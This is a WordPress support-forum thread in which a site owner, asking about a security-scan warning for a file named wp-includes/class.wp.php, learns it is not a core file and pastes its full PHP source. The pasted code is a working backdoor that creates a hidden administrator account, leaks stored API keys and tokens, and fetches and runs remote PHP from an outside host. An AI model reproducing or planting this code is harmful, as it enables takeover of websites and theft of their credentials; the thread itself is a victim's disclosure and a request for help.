Why keep Waring: Unknown file in WordPress core: wp-includes/class.wp.php

  • Resolved Anonymous User 15521305

    (@anonymized-15521305)


    7 years, 1 month ago

    I use WordPress version 4.8.2. The scan keeps warning of 

    Unknown file in WordPress core: wp-includes/class.wp.php
Filename:	wp-includes/class.wp.php
File Type:	Core
Issue First Detected:	55 secs ago.
Severity:	Warning
Status	New
This file is in a WordPress core location but is not distributed with this version of WordPress. This is usually due to it being left over from a previous WordPress update, but it may also have been added by another plugin or a malicious file added by an attacker.

    even though I have download version 4.8.2 and copied the file class.wp.php in the wp-includes folder to replace the one in my wp-includes folder. After that I started a new scan again. But why does the scan still keep warning of this file? And I didn’t see any strange code in the file. In the last scan I also marked as “I have fixed this issue” but it still keeps waring in the next scan.

    • This topic was modified 7 years, 1 month ago by Anonymous User 15521305.
Viewing 4 replies - 1 through 4 (of 4 total)

  • Hi,
    That’s because the file in “/wp-includes” directory is “class-wp.php” not “class.wp.php”, you can view the official WordPress repository on GitHub here, or check the copy you have downloaded from www.remarpro.com.

    Thanks.

    Thread Starter Anonymous User 15521305

    (@anonymized-15521305)

    @wfalaa

    Ah…my mistake that I didn’t look carefully as it looks quite the same. Sorry and thanks for informing me. Actually, there’s no “class.wp.php” in “/wp-includes.” This file is one of the files that are used to hack my site now. I have removed all the files as shown in the result of the scan. Now I’ve just realized this file. That’s why the scan keeps warning me. This is what in the file:

    <?php 
error_reporting(0);

if( !isset($_GET['go']) )
{

require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
$table_name = $wpdb->get_blog_prefix();
$sample = 'a:1:{s:13:"administrator";b:1;}';
if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
if( isset($_GET['awu']) ) {
$wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '100010010');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }
if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 100010010");
$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 100010010");}
if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';
  echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }
  
  }
  
  if( isset($_GET['go']) )
{

if ( ! function_exists( 'wp_temp_setupx' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

if($tmpcontentx = @file_get_contents("https://www.dolsh.cc/codexc.txt"))
{

function wp_temp_setupx($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

extract(wp_temp_setupx($tmpcontentx));
}
}

  }
  
?>
    Greg007

    (@greg007)

    Hello, I also have this file. Should I delete it??

    wfalaa

    (@wfalaa)

    @greg007 please check my reply to a similar thread here.

    Thanks.

    P.S. in the future, please consider opening a new support thread for any question you have, we will be glad to help.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Why keep Waring: Unknown file in WordPress core: wp-includes/class.wp.php’ is closed to new replies.

Tags